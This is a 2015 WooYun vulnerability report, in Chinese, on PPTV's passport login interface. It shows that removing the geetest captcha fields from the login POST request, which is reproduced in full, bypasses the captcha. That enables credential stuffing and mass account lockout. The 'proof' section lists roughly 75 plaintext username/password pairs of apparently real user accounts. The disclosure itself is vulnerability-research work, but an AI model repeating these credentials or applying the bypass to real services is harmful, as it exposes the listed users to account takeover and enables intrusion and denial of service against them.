当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146245

漏洞标题:PPTV某接口修复不当导致仍可撞库用户还可批量封禁用户(大量成功帐号)

相关厂商:PPTV(PPlive)

漏洞作者: Azazel

提交时间:2015-10-13 09:48

修复时间:2015-11-28 15:44

公开时间:2015-11-28 15:44

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:19

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-13: 细节已通知厂商并且等待厂商处理中
2015-10-14: 厂商已经确认,细节仅向厂商公开
2015-10-24: 细节向核心白帽子及相关领域专家公开
2015-11-03: 细节向普通白帽子公开
2015-11-13: 细节向实习白帽子公开
2015-11-28: 细节向公众公开

简要描述:

PPTV某接口修复不当导致仍可撞库用户还可批量封禁用户(大量成功帐号)

详细说明:

http://wooyun.org/bugs/wooyun-2010-0101271


这个洞中提到了

虽然有验证码,但是只要抓包之后把cookies去掉即可。之后就再也没有验证码提示。


看到厂商回复

感谢反馈,处理中


然后我又看了看这个洞,还是这个接口:

http://api.passport.pptv.com/dologin.do


一开始是没有验证码限制的

1.png


抓包查看发现用户名和密码明文传输

2.png


然后Repeater之后查看回显提示滑动验证了,就知道验证码应该出来了

3.png


接下来测试绕过,按照之前说的去掉cookie之后继续Repeater好像是没有发现验证码之类的,但是放开包之后看网页发现验证码确实没了但是也没有用户名错误之类的提示信息了

4.png


不知道去cookie的方法还行不行,然后我这里的方法是,抓包:

POST /dologin.do HTTP/1.1
Host: api.passport.pptv.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://api.passport.pptv.com/dologin.do
Cookie: JSESSIONID=abcenfXEBnkKE_DpSIBbv; Hm_lvt_7adaa440f53512a144c13de93f4c22db=1444644533; Hm_lpvt_7adaa440f53512a144c13de93f4c22db=1444644913
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 302
returnURL=http%3A%2F%2Fpassport.pptv.com%2Fusercenter.aspx&action=login&APTokenRequest=&loginid=aaaaa&password=aaaaaaaaaa&geetest_challenge=46af73dc50674072bf64d96a4055534fdp&geetest_validate=5a5485d4d13f15c7ea5dbe87b6a73a3a&geetest_seccode=5a5485d4d13f15c7ea5dbe87b6a73a3a%7Cjordan&CheckboxSaveInfo=on


去掉

&geetest_challenge=46af73dc50674072bf64d96a4055534fdp&geetest_validate=5a5485d4d13f15c7ea5dbe87b6a73a3a&geetest_seccode=5a5485d4d13f15c7ea5dbe87b6a73a3a%7Cjordan&CheckboxSaveInfo=on


放开包之后发现验证码还有但是给出的并不是验证码错误的提示而是该账号登录失败超过5次,请2小时后再试,由此判断已经绕过了验证码

5.png


然后呢?然后测试撞库看看,发现是成功的:

6.png


再另外关于批量封禁用户就不用多说了吧?两个小时我估计是足够了。。

漏洞证明:

部分成功帐号证明:

258984762	3521686	1576
5246541 123456 1576
423525 123456 1577
wo4fuyi zizi1hang 1578
136122628 1010110 1578
weige0330 56433307 1578
hejfeng 5636963 1578
48851062 123456 1579
12345643 123456 1579
sxj588 6360588 1579
ddd886 dg2273888 1579
156165 123456 1579
2644964 pan138608 1580
linquanchao 19880808 1580
suda621 1988621 1580
wl3223185 3223185 1580
slongup 3351604 1580
85279083 5889578 1581
132456 123456 1581
53845960 8721393 1581
2092188 52016586 1582
592513926 123123 1582
baleestar 82460295 1582
smartjohnny asd0629 1582
jone222 55152440 1582
hsyjnhwx 589745 1583
tanjunshow tanjundiao 1583
q562524699 q81653285 1583
xannin 16283150 1583
785464 123456 1583
qiongyusg wangyufeng 1584
jshan34 22201590 1584
378291322 wanwan 1584
610626050 3823368 1584
gao19930921 5151102 1584
316589803 123456 1584
aijishui zengjiecx 1585
kylinwxh hui545447 1585
cxcm12 88642728 1585
415187212 123456 1586
526194704 86553433 1586
116921472 3355121 1586
wshj95011 198096 1586
w910621 w19910622 1586
1221333 123456 1586
jenn1986 jen1986 1587
fengnicy 2132121321 1587
bingya1111 123456789 1587
156165 123456 1587
liyuplll 8895992 1587
332682765 yvhyga 1588
361692642 231456575 1588
wc_asia 2188655 1588
402782048 58292007 1588
wuxueren88 wuxueren 1589
sdcymr 7226688 1589
10395609 6843957 1589
332682765 yvhyga 1590
595947380 2780771 1590
281448425 1985421 1590
330802078 13786441389 1590
499251345 8704546 1590
21212112 123456 1591
61915619 123456p 1591
zhuqianye zqy000 1592
456123654 123456 1592
414331780 88123456 1592
antonio413 812812 1593
SECOND1760 84935611 1593
pengjian1119 8788tony 1595
448165420 861015 1596
owen458631 1985415521 1597
chenlijianpp 123123 1599
seven71014 leilei520 1599
painejay jinjun 1599

修复方案:

叶良辰的洞敢不给19rank?
给个高rank换个别的验证码或者和主站一样加密吧

版权声明:转载请注明来源 Azazel@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-14 15:42

厂商回复:

多谢少侠,正在改进策略中

最新状态:

暂无


漏洞评价:

评价